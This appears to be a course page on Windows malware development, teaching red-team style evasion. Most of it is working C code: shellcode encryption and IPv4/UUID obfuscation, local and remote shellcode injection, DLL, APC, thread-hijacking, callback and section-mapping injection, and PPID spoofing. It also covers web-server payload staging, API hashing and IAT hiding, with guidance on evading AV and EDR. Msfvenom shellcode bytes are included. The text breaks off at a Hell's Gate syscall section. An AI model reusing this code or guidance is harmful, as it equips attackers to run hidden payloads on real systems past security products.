Malware Development
Fundamentals
QA210 — From Windows API foundations to advanced EDR bypass techniques
Malware Development Lifecycle (MDLC)
Build & refine
Bug hunting
Local testing
Cloud testing
Indicators
Step 1
Overview
Malware is software specifically designed to carry out malicious actions such as unauthorized access to a computer or stealing sensitive data. The term "malware" is often associated with illegal or criminal activity, but it can also be used by ethical hackers such as penetration testers and red team members during authorized security assessments of an organization.
From an offensive security perspective, testers typically have three main options when it comes to the types of tools used in an assessment: Open-Source Tools (OSTs) — which are quickly identified by security vendors; purchasing commercial tools — closed-source, with a better chance of bypassing security solutions; or developing custom tools — which have not been analyzed or identified by security vendors, providing the greatest advantage for the attacking team. This is why knowledge of malware development is crucial for a successful offensive security assessment.
Why Choose C?
Any programming language can be used to create malware — Python, PowerShell, C#, C++, Go. However, C stands out for the following reasons: low-level languages are harder to reverse engineer; they do not require prerequisites on the target system (unlike Python, which needs an interpreter); the resulting file size is compact; and they provide fine-grained control when interacting with the operating system. High-level languages are more abstracted from the OS, less efficient with memory, and offer less overall control due to the abstraction of complex functionality. In contrast, low-level languages like C provide a way to interact with the operating system at a detailed level and give developers more freedom when working with the system.
Malware Development Lifecycle (MDLC)
The Malware Development Lifecycle (MDLC) is a customized version of the SDLC, consisting of 5 main phases: Development — start building or refining functionality; Testing — perform testing to detect bugs; Offline AV/EDR Testing — run the developed malware against as many security products as possible offline; Online AV/EDR Testing — run against cloud-connected security products; and IoC Analysis — analyze the malware and extract Indicators of Compromise. After step 5, the process loops back to step 1 for continuous improvement.
Online AV/EDR testing may result in your malware being submitted to security vendors and added to their databases. Always test offline first, and exercise caution when testing online.
Required Tools
| Tool | Purpose |
|---|---|
Visual Studio | Primary C/C++ development environment |
x64dbg | Open-source debugger for Windows x64/x86 binaries |
PE-Bear | PE structure analysis, view imports/exports |
Process Hacker 2 | View and control processes, loaded DLLs, memory regions |
Msfvenom | Shellcode payload generation |
VMware / VirtualBox | Virtualization environment for testing |
Windows SDK | Windows development headers and libraries |
Foundational Knowledge
Windows Architecture
A processor in the Windows operating system can operate in two different modes: User Mode and Kernel Mode. Applications run in user mode and operating system components run in kernel mode. When an application wants to perform a task such as creating a file, it cannot do so directly — the only entity that can complete the task is the kernel, so applications must follow a process called the Function Call Flow (FCF).
The main components in the Windows architecture include: User Processes — programs executed by the user (Notepad, Chrome); Subsystem DLLs — DLLs containing API functions called by user processes (kernel32.dll, user32.dll, advapi32.dll); Ntdll.dll — a system-wide DLL at the lowest layer of user mode that creates the transition from user mode to kernel mode (commonly referred to as the Native API or NTAPI); and Executive Kernel — the Windows Kernel that calls drivers and other modules in kernel mode.
Function Call Flow (FCF)
The FCF process begins when a user application calls a WinAPI function (e.g., CreateFile in kernel32.dll). This DLL then calls the equivalent NTAPI function (NtCreateFile in ntdll.dll). Next, ntdll.dll executes an assembly instruction (sysenter on x86 or syscall on x64) to transition to kernel mode. In kernel mode, the NtCreateFile function is called, which interacts with drivers and modules to complete the work.
Applications can call NTAPI functions (functions in NTDLL) directly without going through the WinAPI. The WinAPI is simply a wrapper layer for the Native API. However, using the Native API is more difficult because it is not officially documented by Microsoft (undocumented).
Virtual Memory & Paging
In modern operating systems, memory is not mapped directly to physical RAM. Instead, processes use virtual memory addresses that are mapped to physical addresses. Virtual memory is based on the concept of Memory paging — memory is divided into "pages" of 4KB each. A page can be in one of several states: Free (no data, ready for use), Reserved (set aside for a specific purpose but no data yet), or Committed (assigned to an actual physical memory region).
Important page protection options: PAGE_NOACCESS (disables all access to the page), PAGE_EXECUTE_READWRITE (allows read, write, and execute — highly discouraged), PAGE_READONLY (allows read-only access).
Memory Protection
Two important memory protection mechanisms: DEP (Data Execution Prevention) — prevents code execution in memory regions that do not have the execute flag; and ASLR (Address Space Layout Randomization) — randomly arranges the address space positions of key data areas, including the base of the executable and the positions of the stack, heap, and libraries.
Windows API
The Windows API provides many specialized data types beyond common ones like int and float. Key data types include:
| Data Type | Description | Example |
|---|---|---|
HANDLE | Handle to an object (file, process, event) | HANDLE hFile = CreateFile(...) |
DWORD | Unsigned 32-bit integer | DWORD dwBytesRead; |
LPVOID | Pointer to any type | LPVOID pMemory = VirtualAlloc(...) |
LPSTR / LPWSTR | ANSI / Unicode string pointer | LPSTR buf = "Hello"; |
BOOL | Represents TRUE or FALSE | BOOL bResult = DeleteFile(...) |
HMODULE | Handle to a module (DLL/EXE) | HMODULE hMod = GetModuleHandle(...) |
ANSI vs Unicode
Most Windows API functions have two versions ending in "A" (ANSI) or "W" (Wide/Unicode). For example: CreateFileA takes LPCSTR (ANSI 8-bit string), CreateFileW takes LPCWSTR (Unicode 16-bit string). Note the different byte sizes: char str[] = "qa210" takes 6 bytes, wchar_t str[] = L"qa210" takes 12 bytes (2 bytes per character).
In/Out Parameters & Error Handling
The Windows API uses IN (input) and OUT (output) parameters. OUT parameters are typically passed by pointer. For error handling, use GetLastError() for WinAPI and NTSTATUS with the NT_SUCCESS() macro for NTAPI. Always check return values when calling WinAPI — for example, CreateFileW returns INVALID_HANDLE_VALUE on failure.
Portable Executable (PE) Format
PE is the executable file format on Windows, including EXE, DLL, and SYS. Understanding PE structure is a critical foundation for malware development because it allows you to understand how malware is loaded into memory, how imports/exports work, and how to perform injection techniques.
Important PE components: DOS Header starts with the magic "MZ" (0x5A4D) and contains e_lfanew — the offset to NT Headers; File Header contains machine info, number of sections, and timestamp; Optional Header contains AddressOfEntryPoint (entry point), ImageBase (base address), and DataDirectory — an array of 16 entries pointing to important data tables like Export Table, Import Table, and Resource Table.
Dynamic-Link Library (DLL)
A DLL is a library containing code and data that can be used by multiple programs simultaneously. DLLs have an entry point DllMain that is called when the DLL is loaded/unloaded:
BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved) {
switch (ul_reason_for_call) {
case DLL_PROCESS_ATTACH:
// Runs when DLL is loaded into a process
break;
case DLL_THREAD_ATTACH:
// Runs when a new thread is created
break;
case DLL_THREAD_DETACH:
break;
case DLL_PROCESS_DETACH:
// Runs when DLL is unloaded
break;
}
return TRUE;
}
To export a function from a DLL, use __declspec(dllexport). There are two ways to load a DLL: Load-time dynamic linking (linked at compile time using a .lib file) and Run-time dynamic linking (linked at runtime using LoadLibraryA/W + GetProcAddress). Run-time linking is more common in malware because it does not leave traces in the IAT at compile time.
AV Malware Detection Mechanisms
Understanding how AV detects malware is the foundation for building bypass techniques. The main mechanisms include:
FC 48 83 E4 F0 E8 C0 00 00 00 can be identified as an msfvenom payload. Bypass: avoid hardcoding values, encrypt payloads, retrieve values dynamically.Payload Placement
As a malware developer, you have several choices for where to store the payload within a PE file. Depending on this choice, the payload will reside in a different section of the PE file, affecting read/write capabilities and the level of detection by AV.
.data Section
The .data section contains initialized global and static variables. This section is readable and writable (R/W), making it suitable for encrypted payloads that need to be decrypted at runtime. Payloads stored in global or local variables will be placed in .data depending on compiler settings.
// .data saved payload - read/write, suitable for encrypted payloads
unsigned char Data_RawData[] = {
0xFC, 0x48, 0x83, 0xE4, 0xF0, 0xE8, 0xC0, 0x00, 0x00, 0x00,
0x41, 0x51, 0x41, 0x50, 0x52, 0x51, 0x56, 0x48, 0x31, 0xD2
// ... msfvenom shellcode
};
int main() {
printf("[i] Data_RawData var : 0x%p \n", Data_RawData);
// Can modify directly since .data is R/W
return 0;
}
.rdata Section
Variables declared with the const keyword are stored in .rdata (read-only data). The "r" indicates the data is read-only — any attempt to modify it will cause an access violation. However, depending on the compiler, .data and .rdata may be merged, or even merged into .text. Use .rdata for payloads that do not need in-place decryption, but if in-place decryption is required, you must change the memory protection first.
Payloads can also be stored in any custom section using the pragma directive: #pragma section(".mysec", execute, read, write). This helps avoid signature detection based on inspecting .data/.rdata sections.
Payload Encryption
Payload Encryption is a technique used to hide code within a malicious file, making detection more difficult for security solutions. Encryption helps malware remain undetected for longer periods. However, the more data that is encrypted in a file, the higher the file's entropy — which can cause security solutions to flag the file as suspicious. The three most common encryption algorithms in malware development are XOR, RC4, and AES.
XOR Encryption
XOR is the simplest encryption algorithm, suitable for small payloads. Three levels of increasing complexity:
// Method 1: XOR with a single byte key (vulnerable to brute force)
VOID XorByOneKey(IN PBYTE pShellcode, IN SIZE_T sShellcodeSize, IN BYTE bKey) {
for (size_t i = 0; i < sShellcodeSize; i++) {
pShellcode[i] = pShellcode[i] ^ bKey;
}
}
// Method 2: XOR with key + index (increases key space)
VOID XorByiKeys(IN PBYTE pShellcode, IN SIZE_T sShellcodeSize, IN BYTE bKey) {
for (size_t i = 0; i < sShellcodeSize; i++) {
pShellcode[i] = pShellcode[i] ^ (bKey + i);
}
}
// Method 3: XOR with a multi-byte key array (hardest to crack)
VOID XorByInputKey(IN PBYTE pShellcode, IN SIZE_T sShellcodeSize,
IN PBYTE bKey, IN SIZE_T sKeySize) {
for (size_t i = 0, j = 0; i < sShellcodeSize; i++, j++) {
if (j >= sKeySize) {
j = 0;
}
pShellcode[i] = pShellcode[i] ^ bKey[j];
}
}
XOR should be used for small payloads (e.g., obfuscating strings). For larger payloads, use AES or RC4 for stronger security and resistance to brute force attacks.
RC4 Encryption
RC4 is a fast, efficient, and bidirectional cryptographic algorithm — the same function is used for both encryption and decryption. RC4 uses the Key Scheduling Algorithm (KSA) to initialize the state array, then uses the Pseudo-Random Generation Algorithm (PRGA) to encrypt data.
// RC4 Key Scheduling Algorithm (KSA)
void rc4_init(unsigned char* key, int keylen, unsigned char* S) {
int i, j = 0;
for (i = 0; i < 256; i++) {
S[i] = i;
}
for (i = 0; i < 256; i++) {
j = (j + S[i] + key[i % keylen]) % 256;
// Swap S[i] and S[j]
unsigned char temp = S[i];
S[i] = S[j];
S[j] = temp;
}
}
// RC4 Pseudo-Random Generation Algorithm (PRGA)
void rc4_crypt(unsigned char* S, unsigned char* data, int datalen) {
int i = 0, j = 0, k;
for (k = 0; k < datalen; k++) {
i = (i + 1) % 256;
j = (j + S[i]) % 256;
// Swap S[i] and S[j]
unsigned char temp = S[i];
S[i] = S[j];
S[j] = temp;
// Generate keystream byte
int t = (S[i] + S[j]) % 256;
data[k] ^= S[t];
}
}
Never hardcode keys directly in source code. Keys can be discovered during reverse engineering. All of the following key representations are detectable: unsigned char* key = "qa210";, unsigned char key[] = {0x71, 0x61, 0x32, ...};, or unsigned char key[] = {'q','a','2','1','0'};. Instead, generate keys at runtime or use a derivation method.
AES Encryption
AES (Advanced Encryption Standard) is the strongest symmetric encryption algorithm of the three, suitable for large payloads. The tiny-aes-c library provides a lightweight implementation of AES-128/192/256 suitable for malware development. AES uses a block cipher with a 16-byte block size and supports operating modes such as CBC, CTR, and ECB.
// Using tiny-aes-c to encrypt/decrypt payloads
#include "aes.h"
struct AES_ctx ctx;
uint8_t key[16] = { /* derived at runtime */ };
uint8_t iv[16] = { /* derived at runtime */ };
// Initialize AES context with key and IV
AES_init_ctx_iv(&ctx, key, iv);
// Decrypt payload (AES-CBC mode)
AES_CBC_decrypt_buffer(&ctx, encryptedPayload, payloadSize);
Payload Obfuscation
Obfuscation is a technique for hiding payloads by transforming them into different formats (IPv4, IPv6, MAC addresses, UUIDs) to avoid signature detection. The payload is converted into strings that appear legitimate, and is only restored to its original form at runtime. These techniques help reduce entropy and make payloads look like normal data during static analysis.
IPv4/IPv6 Fuscation
Transforms the payload into IPv4 or IPv6 address strings. Every 4 bytes of shellcode are represented as one IPv4 address octet. For example: 0xFC4883E4 becomes 252.72.131.228. For IPv6, every 16 bytes of shellcode become one IPv6 address, allowing obfuscation of larger data per entry.
// IPv4 Deobfuscation - convert IPv4 strings back to shellcode
BOOL Ipv4Deobfuscation(IN CHAR* Ipv4Array[], IN SIZE_T NmbrOfElements,
OUT PBYTE* ppDAddress, OUT SIZE_T* pDSize) {
PBYTE pBytes = (PBYTE)HeapAlloc(GetProcessHeap(), 0, NmbrOfElements * 4);
if (!pBytes) return FALSE;
for (SIZE_T i = 0; i < NmbrOfElements; i++) {
// inet_addr converts "A.B.C.D" to 4 bytes
*(DWORD*)(pBytes + i * 4) = inet_addr(Ipv4Array[i]);
}
*ppDAddress = pBytes;
*pDSize = NmbrOfElements * 4;
return TRUE;
}
MAC Fuscation
Similar to IPv4, but transforms the payload into MAC addresses. Every 6 bytes of shellcode become one MAC address. The sscanf function with format string "%02hhx:%02hhx:%02hhx:%02hhx:%02hhx:%02hhx" is used to parse MAC addresses back into bytes.
UUID Fuscation
Every 16 bytes of shellcode are represented as a UUID (e.g., FC4883E4-F0E8-C000-0000-4151-41505251). Use UuidFromStringA from the WinAPI to convert a UUID string back into 16 binary bytes. This is a powerful technique because UUIDs look completely legitimate in source code and have a fixed size of 16 bytes per entry.
// UUID Deobfuscation
BOOL UuidDeobfuscation(IN CONST RPC_CSTR UuidArray[], IN SIZE_T NmbrOfElements,
OUT PBYTE* ppDAddress, OUT SIZE_T* pDSize) {
PBYTE pBytes = (PBYTE)HeapAlloc(GetProcessHeap(), 0, NmbrOfElements * 16);
if (!pBytes) return FALSE;
for (SIZE_T i = 0; i < NmbrOfElements; i++) {
// UuidFromStringA converts UUID string to 16 bytes
if (RPC_S_OK != UuidFromStringA((RPC_CSTR)UuidArray[i],
(UUID*)(pBytes + i * 16))) {
return FALSE;
}
}
*ppDAddress = pBytes;
*pDSize = NmbrOfElements * 16;
return TRUE;
}
Local Payload Execution
Shellcode Injection (Local)
The process of executing shellcode in the current process consists of the following main steps: allocate a memory region with VirtualAlloc, write the payload to that region, change memory protection if needed, create a thread to execute, and free the memory when done.
// Local Shellcode Injection - basic process
BOOL RunShellcode(IN PBYTE pShellcode, IN SIZE_T sSizeOfShellcode) {
// 1. Allocate RW memory region
PVOID pAddress = VirtualAlloc(NULL, sSizeOfShellcode,
MEM_COMMIT | MEM_RESERVE,
PAGE_READWRITE);
if (!pAddress) return FALSE;
// 2. Write payload to memory region
memcpy(pAddress, pShellcode, sSizeOfShellcode);
// 3. Change protection to RX (executable)
DWORD dwOldProtection = 0;
if (!VirtualProtect(pAddress, sSizeOfShellcode,
PAGE_EXECUTE_READ, &dwOldProtection))
return FALSE;
// 4. Execute payload using CreateThread
HANDLE hThread = CreateThread(NULL, 0,
(LPTHREAD_START_ROUTINE)pAddress,
NULL, 0, NULL);
if (!hThread) return FALSE;
// 5. Wait for thread to complete
WaitForSingleObject(hThread, INFINITE);
// 6. Free memory
VirtualFree(pAddress, 0, MEM_RELEASE);
CloseHandle(hThread);
return TRUE;
}
Using PAGE_EXECUTE_READWRITE (RWX) is a major red flag for AV/EDR. Always use the RW → Write → RX flow instead of directly allocating RWX memory. Allocating RWX memory is one of the most suspicious behaviors that security solutions monitor.
DLL Injection (Process Injection)
DLL Injection is the technique of inserting a DLL into a running process. The process: open a handle to the target process with OpenProcess, allocate memory in the target process with VirtualAllocEx, write the DLL path with WriteProcessMemory, and create a remote thread that calls LoadLibraryA using CreateRemoteThread.
// DLL Injection into a remote process
BOOL InjectDll(IN DWORD dwPid, IN const char* dllPath) {
// 1. Open handle to target process
HANDLE hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, dwPid);
if (!hProcess) return FALSE;
// 2. Allocate memory in target process
SIZE_T sSize = strlen(dllPath) + 1;
PVOID pAddress = VirtualAllocEx(hProcess, NULL, sSize,
MEM_COMMIT | MEM_RESERVE,
PAGE_READWRITE);
if (!pAddress) { CloseHandle(hProcess); return FALSE; }
// 3. Write DLL path to target process
if (!WriteProcessMemory(hProcess, pAddress, dllPath, sSize, NULL)) {
CloseHandle(hProcess); return FALSE;
}
// 4. Find LoadLibraryA address
HMODULE hKernel32 = GetModuleHandleW(L"kernel32.dll");
pfnLoadLibraryA pLoadLibraryA = (pfnLoadLibraryA)
GetProcAddress(hKernel32, "LoadLibraryA");
// 5. Create remote thread calling LoadLibraryA
HANDLE hThread = CreateRemoteThread(hProcess, NULL, 0,
(LPTHREAD_START_ROUTINE)pLoadLibraryA,
pAddress, 0, NULL);
if (!hThread) { CloseHandle(hProcess); return FALSE; }
WaitForSingleObject(hThread, INFINITE);
CloseHandle(hThread);
CloseHandle(hProcess);
return TRUE;
}
Shellcode Injection (Remote)
Remote Shellcode Injection is similar to DLL Injection, but instead of writing a DLL path and calling LoadLibraryA, you write shellcode directly into the target process and create a remote thread to execute at the shellcode address. This technique is more flexible because it does not require a DLL file on disk.
Staging
Staging is the technique of storing payloads at an external source (web server, Windows Registry) rather than embedding them directly in the binary. This helps reduce the executable file size, lower entropy, and allows updating payloads without recompiling. Staging is particularly useful when payloads are large or when you need to change payloads between executions.
Web Server Staging
Uses the WinINet API (InternetOpenW, InternetOpenUrlW, InternetReadFile) to download payloads from a remote server. The process: initialize a WinINet session, open the URL, read the data, and close handles. Payload size can be determined dynamically by reading until no more data is available.
// Download payload from a web server
BOOL DownloadPayload(IN LPCWSTR url, OUT PBYTE* ppBuffer, OUT SIZE_T* pSize) {
HINTERNET hInternet = InternetOpenW(L"Mozilla/5.0",
INTERNET_OPEN_TYPE_DIRECT,
NULL, NULL, 0);
if (!hInternet) return FALSE;
HINTERNET hUrl = InternetOpenUrlW(hInternet, url, NULL, 0,
INTERNET_FLAG_SECURE, 0);
if (!hUrl) { InternetCloseHandle(hInternet); return FALSE; }
// Dynamic payload size - read until no more data
DWORD dwBytesRead = 0;
SIZE_T totalSize = 0;
BYTE tempBuffer[4096];
PBYTE pBuffer = NULL;
while (InternetReadFile(hUrl, tempBuffer, sizeof(tempBuffer), &dwBytesRead)
&& dwBytesRead > 0) {
pBuffer = (PBYTE)HeapReAlloc(GetProcessHeap(), 0, pBuffer,
totalSize + dwBytesRead);
memcpy(pBuffer + totalSize, tempBuffer, dwBytesRead);
totalSize += dwBytesRead;
}
*ppBuffer = pBuffer;
*pSize = totalSize;
InternetCloseHandle(hUrl);
InternetCloseHandle(hInternet);
return TRUE;
}
Windows Registry Staging
The Windows Registry can be used as a payload storage location. Advantages: no network connection required, payloads are stored persistently on the system. Use RegOpenKeyExW, RegSetValueExW, and RegGetValueW to write and read payloads from the Registry. Conditional compilation (#ifdef) can be used to create two separate binaries: one to stage the payload into the Registry, and one to read and execute it.
Thread Hijacking
Thread Hijacking is a technique that takes control of a running thread to execute malicious code instead of creating a new thread. The main advantage over CreateThread/CreateRemoteThread is that no new thread is created — this helps avoid detection by security solutions that monitor thread creation. The technique works by suspending a thread, changing its context (specifically the instruction pointer RIP/EIP) to point to the shellcode, and then resuming the thread.
Local Thread Hijacking
// Local Thread Hijacking
BOOL HijackThread(IN HANDLE hThread, IN PVOID pAddress) {
// 1. Suspend the thread
SuspendThread(hThread);
// 2. Get thread context
CONTEXT ctx = { .ContextFlags = CONTEXT_FULL };
if (!GetThreadContext(hThread, &ctx)) {
ResumeThread(hThread);
return FALSE;
}
// 3. Change instruction pointer (RIP on x64)
ctx.Rip = (DWORD64)pAddress;
// 4. Set the new thread context
if (!SetThreadContext(hThread, &ctx)) {
ResumeThread(hThread);
return FALSE;
}
// 5. Resume thread - will execute from the new address
ResumeThread(hThread);
return TRUE;
}
Remote Thread Hijacking
Remote Thread Hijacking applies the same principle but to threads of a different process. Additional step: use CreateToolhelp32Snapshot to enumerate threads of the target process, then select an appropriate thread to hijack. This technique completely avoids calling CreateRemoteThread — an API commonly hooked by EDR.
APC Injection
Asynchronous Procedure Call (APC) is a Windows mechanism that allows code execution in the context of a specific thread. APC Injection leverages this mechanism to insert a payload into a target thread's APC queue. When the thread enters an alertable state (calling SleepEx, WaitForSingleObjectEx, etc.), the APC will be executed.
Standard APC Injection
// APC Injection into a remote process
BOOL ApcInjection(IN DWORD dwPid, IN PBYTE pShellcode, IN SIZE_T sSize) {
// 1. Open target process
HANDLE hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, dwPid);
// 2. Allocate and write shellcode
PVOID pAddress = VirtualAllocEx(hProcess, NULL, sSize,
MEM_COMMIT | MEM_RESERVE,
PAGE_EXECUTE_READWRITE);
WriteProcessMemory(hProcess, pAddress, pShellcode, sSize, NULL);
// 3. Find alertable threads
HANDLE hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPTHREAD, 0);
THREADENTRY32 te32 = { .dwSize = sizeof(THREADENTRY32) };
if (Thread32First(hSnapshot, &te32)) {
do {
if (te32.th32OwnerProcessID == dwPid) {
HANDLE hThread = OpenThread(THREAD_ALL_ACCESS, FALSE,
te32.th32ThreadID);
// 4. Queue APC to the thread
QueueUserAPC((PAPCFUNC)pAddress, hThread, 0);
CloseHandle(hThread);
}
} while (Thread32Next(hSnapshot, &te32));
}
CloseHandle(hSnapshot);
CloseHandle(hProcess);
return TRUE;
}
Early Bird APC Injection
Early Bird is a variant of APC Injection that executes before the main thread of the process begins running. The process: create a process in a suspended state using CreateProcess with the CREATE_SUSPENDED flag, queue an APC to the main thread, then resume the process. The thread will execute the APC before running the process's main code. This technique is particularly effective because it avoids race conditions — the thread is guaranteed to be in an alertable state when resumed.
Callback Code Execution
Callback Code Execution takes advantage of Windows APIs that accept function pointer callbacks as parameters. Instead of creating a new thread or injecting into another process, malware passes the shellcode address as a callback function to legitimate APIs. When the API is called, it executes the callback — which is the shellcode. This technique is extremely effective because it uses legitimate APIs, does not create new threads, and is difficult to detect through conventional monitoring methods.
// Callback Code Execution - using EnumWindows
// Pass shellcode address as the callback
BOOL result = EnumWindows((WNDENUMPROC)pShellcodeAddress, 0);
// Other callback APIs that can be used:
// EnumChildWindows, EnumDesktopWindows, EnumSystemLocalesA
// EnumSystemLocalesW, EnumTimeFormatsA, EnumDesktopWindows
// CreateTimerQueueTimer, EnumUILanguages
// CertEnumSystemStore, EnumSystemGeoID
Callback execution does not require CreateThread or CreateRemoteThread, does not modify thread context, and uses completely legitimate Windows APIs. This is one of the stealthiest techniques for executing shellcode.
Mapping Injection
Mapping Injection uses Windows Section objects (shared memory) to inject shellcode into a target process without needing VirtualAllocEx/WriteProcessMemory — two APIs commonly hooked by EDR. This technique uses NtCreateSection, NtMapViewOfSection, and NtUnmapViewOfSection to create a shared memory section, write the payload to a local view, then map it into the target process.
// Local Mapping Injection
BOOL MappingInjection(IN PBYTE pShellcode, IN SIZE_T sSize) {
HANDLE hSection = NULL;
PVOID pLocalView = NULL;
PVOID pRemoteView = NULL;
SIZE_T sViewSize = sSize;
// 1. Create section object
NTSTATUS status = NtCreateSection(&hSection, SECTION_ALL_ACCESS, NULL,
&(LARGE_INTEGER){ .QuadPart = sSize },
PAGE_EXECUTE_READWRITE,
SEC_COMMIT, NULL);
// 2. Map section into local process (R/W)
NtMapViewOfSection(hSection, GetCurrentProcess(), &pLocalView, 0, 0,
NULL, &sViewSize, ViewUnmap, 0, PAGE_READWRITE);
// 3. Write shellcode to local view
memcpy(pLocalView, pShellcode, sSize);
// 4. Map section into local process with RX (executable)
NtMapViewOfSection(hSection, GetCurrentProcess(), &pRemoteView, 0, 0,
NULL, &sViewSize, ViewUnmap, 0, PAGE_EXECUTE_READ);
// 5. Execute shellcode
HANDLE hThread = CreateThread(NULL, 0,
(LPTHREAD_START_ROUTINE)pRemoteView,
NULL, 0, NULL);
WaitForSingleObject(hThread, INFINITE);
// 6. Cleanup
NtUnmapViewOfSection(GetCurrentProcess(), pLocalView);
NtUnmapViewOfSection(GetCurrentProcess(), pRemoteView);
NtClose(hSection);
CloseHandle(hThread);
return TRUE;
}
Remote Mapping Injection
The remote variant maps the section object into a target process instead of the local process. This completely bypasses VirtualAllocEx and WriteProcessMemory by using NtMapViewOfSection with the target process handle. This technique is considered one of the most sophisticated injection methods available today.
Function Stomping Injection
Function Stomping (also known as Function Hooking Overwrite) is a technique that overwrites the content of a legitimate function in a loaded DLL with shellcode. Instead of allocating new memory, it uses existing memory that is already marked as executable. This technique helps bypass security checks that monitor the allocation of new executable memory regions.
The process: load a DLL into the process using LoadLibraryA, find the target function address using GetProcAddress, change the memory protection to RW using VirtualProtect, overwrite the function with shellcode, restore the protection to RX, and execute via a callback or by directly calling the overwritten function.
Choose functions that are rarely called during normal operation — for example, functions in rarely-used DLLs. If you choose a frequently-called function (like CreateFileW), the shellcode will execute multiple times unintentionally or cause crashes.
Spoofing
PPID Spoofing (Parent Process ID)
PPID Spoofing changes the parent process of a newly created process, making it appear as if it was launched by a legitimate process (e.g., explorer.exe) rather than the malware. This helps bypass security rules based on parent-child process relationships. The technique uses PROC_THREAD_ATTRIBUTE_LIST and UpdateProcThreadAttribute with PROC_THREAD_ATTRIBUTE_PARENT_PROCESS to specify the parent process.
// PPID Spoofing - create process with a fake parent process
BOOL CreateSpoofedProcess(IN DWORD dwParentPid, IN LPCWSTR lpCmdLine) {
// Open handle to the parent process to spoof
HANDLE hParentProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, dwParentPid);
// Initialize STARTUPINFOEX
STARTUPINFOEXW si = { 0 };
PROCESS_INFORMATION pi = { 0 };
si.StartupInfo.cb = sizeof(STARTUPINFOEXW);
// Allocate PROC_THREAD_ATTRIBUTE_LIST
SIZE_T sAttrListSize = 0;
InitializeProcThreadAttributeList(NULL, 1, 0, &sAttrListSize);
si.lpAttributeList = (LPPROC_THREAD_ATTRIBUTE_LIST)
HeapAlloc(GetProcessHeap(), 0, sAttrListSize);
InitializeProcThreadAttributeList(si.lpAttributeList, 1, 0, &sAttrListSize);
// Set parent process attribute
UpdateProcThreadAttribute(si.lpAttributeList, 0,
PROC_THREAD_ATTRIBUTE_PARENT_PROCESS,
&hParentProcess, sizeof(HANDLE), NULL, NULL);
// Create process with spoofed PPID
CreateProcessW(NULL, (LPWSTR)lpCmdLine, NULL, NULL, FALSE,
EXTENDED_STARTUPINFO_PRESENT, NULL, NULL,
&si.StartupInfo, &pi);
// Cleanup
DeleteProcThreadAttributeList(si.lpAttributeList);
CloseHandle(hParentProcess);
CloseHandle(pi.hThread);
CloseHandle(pi.hProcess);
return TRUE;
}
Process Argument Spoofing
Process Argument Spoofing creates a process with fake command-line arguments (appearing legitimate, such as notepad.exe C:\Windows\Temp\readme.txt), but then overwrites them with the real arguments in memory before the process actually executes. This technique deceives monitoring tools that only read the initial command line.
String Hashing
String Hashing replaces API name strings with their hash values, helping avoid detection through IAT checking and string scanning. Instead of calling GetProcAddress(hModule, "VirtualAlloc"), you calculate the hash of "VirtualAlloc" and find the function with a matching hash in the DLL's Export Table. Common hashing algorithms:
// DjB2 Hash Algorithm
DWORD HashStringDjb2A(IN PCHAR String) {
ULONG Hash = 5381;
while (*String) {
Hash = ((Hash << 5) + Hash) + *String;
String++;
}
return Hash;
}
// Jenkins One-At-A-Time 32-bit Hash
DWORD HashStringJenkinsOneAtATime32BitA(IN PCHAR String) {
DWORD Hash = 0;
while (*String) {
Hash += *String;
Hash += Hash << 10;
Hash ^= Hash >> 6;
String++;
}
Hash += Hash << 3;
Hash ^= Hash >> 11;
Hash += Hash << 15;
return Hash;
}
IAT Hiding & Obfuscation
The IAT (Import Address Table) contains a list of all functions that a program uses — information that is extremely valuable to AV. IAT Hiding is a technique to remove or conceal this information, preventing AV from knowing which APIs the program uses simply by checking the IAT.
Method 1: Dynamic Resolution
Instead of importing APIs at compile time (which leaves traces in the IAT), use GetModuleHandle + GetProcAddress at runtime to obtain function addresses. However, directly calling GetModuleHandle and GetProcAddress still leaves traces in the IAT.
Method 2: Custom GetProcAddress & GetModuleHandle
Implement custom versions of GetProcAddress and GetModuleHandle by parsing PE headers directly. The custom GetModuleHandle traverses PEB → InMemoryOrderModuleList to find DLLs; the custom GetProcAddress parses the DLL's Export Table to find functions by name or hash.
API Hashing
Combines String Hashing with IAT Hiding: instead of using string names, use the hash of API names to find functions. This technique completely removes API name strings from the binary, making static analysis much more difficult.
Compile-Time API Hashing
Takes API Hashing a step further: hashes are calculated at compile time using constexpr or macros, leaving no strings in the binary. At runtime, only pre-calculated hash values are used to resolve APIs.
API Hooking
API Hooking is a technique that intercepts and modifies the behavior of API functions by modifying code at the function's address. It is both a tool used by EDR for monitoring and a technique that malware can utilize. The main hooking methods include:
Detours
Microsoft Detours is the most popular hooking library. It works by overwriting the first 5+ bytes of the target function with a jump instruction (trampoline) to the hook function. When the original function is called, the execution flow is redirected to the hook function, which can inspect/modify parameters before calling the original function or skip it entirely.
MinHook Library
MinHook is a lightweight hooking library that supports hooking multiple functions simultaneously. It provides a simple API: MH_Initialize, MH_CreateHook, MH_EnableHook.
API Hooking Using Windows APIs
Hooking using pure Windows APIs without external libraries. The technique: change memory protection, write jump instructions, restore protection. Can be used to build keyloggers (hook GetAsyncKeyState or use SetWindowsHookEx) or shellcode injection monitors.
Syscalls
Syscalls provide a mechanism to call directly into kernel mode, bypassing the WinAPI and ntdll.dll layers. EDRs commonly hook functions in ntdll.dll to monitor API calls — by calling syscalls directly, malware completely bypasses userland hooks. However, syscall numbers change between Windows versions, so techniques are needed to determine the correct syscall number at runtime.
SysWhispers
SysWhispers is a tool that automatically generates syscall stubs for NTAPI functions. It generates assembly code containing the syscall number and stub code for each function. SysWhispers2 improves upon this by automatically resolving syscall numbers at runtime through a sorting algorithm. SysWhispers3 adds support for indirect syscalls and other advanced techniques.
// SysWhispers2 - auto-resolve syscall number at runtime
// Generated stub for NtAllocateVirtualMemory
EXTERN_C NTSTATUS NtAllocateVirtualMemory(
HANDLE ProcessHandle,
PVOID* BaseAddress,
ULONG_PTR ZeroBits,
PSIZE_T RegionSize,
ULONG AllocationType,
ULONG Protect);
// Implementation auto-finds syscall number
// by sorting functions in ntdll export table
Hell's Gate
Hell's Gate is a technique for resolving syscall numbers at runtime by directly reading the code of ntdll.dll in memory. If EDR has already hooked a function in ntdll, the first bytes will be replaced with a jump instruction. Hell's Gate detects hooks by checking the first bytes of the function — if it starts with mov eax, SSN (4C 8B D1 B8), it has not been hooked and the syscall number can be extracted; if it starts with a jump instruction, it has been hooked.
// Hell's Gate - Resolve syscall number from ntdll
// Check if function is hooked
